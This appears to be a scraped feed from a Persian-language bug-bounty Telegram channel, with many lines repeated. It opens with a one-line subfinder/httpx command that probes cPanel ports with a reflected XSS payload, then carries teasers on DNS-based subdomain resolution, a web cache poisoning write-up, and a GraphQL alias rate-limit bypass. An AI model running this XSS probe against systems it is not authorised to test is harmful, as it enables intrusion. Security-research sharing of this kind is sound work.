subfinder -d domain.com -all -silent| httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">'
یه نکته فاکینگ خفن داریم سعی میکنم واضح توضیحش بدم👍
پرسش از DNS server های خود سازمان برای ریزالو بیشتر ساب دامین ها 📿
وقتی بصورت عادی dnsx به ما 100 تا ساب دامین لایو برمیگردونه آیا واقعا 100 تا از اون ها بالا هستن؟ 🤔
پس بقیه چی؟
پرسش از DNS server های خود سازمان برای ریزالو بیشتر ساب دامین ها 📿
وقتی بصورت عادی dnsx به ما 100 تا ساب دامین لایو برمیگردونه آیا واقعا 100 تا از اون ها بالا هستن؟ 🤔
پس بقیه چی؟
👍2
optizsec.com/?p=57
رایتاپ آسیب پذیری که خودم از برنامه داخلی زدم
رایتاپ آسیب پذیری که خودم از برنامه داخلی زدم
optizsec
المنتور #57 - optizsec
داستان آسیب پذیری وب کش پویزنینگ به نام خدا سلام به تمامی دوستان و همکاران عزیز.تو این رایتاپ میخوایم برسی کنیم که چطور به آسیب پذیری وب کش پویزنینگ رسیدم D:ار اونجایی که اجازه انتشار اسم تارگت رو ندارم شما اون رو target.com در نظر بگیرید. اسکوپ برنامه => …
❤7
Forwarded from digMeMore (Yasho)
ویدئو جدید رفت بالا، آسیبپذیری ۴۵ میلیون تومانی متین روی دیوار
https://www.youtube.com/watch?v=B9Cbp_10Z7I
https://www.youtube.com/watch?v=B9Cbp_10Z7I
😈7
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
#graphql aliases rate limit bypass
@matitanium
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
گراف کیو ال در برابر ریت لیمیت دفاعی نداره!
#graphql aliases rate limit bypass
@matitanium
👍9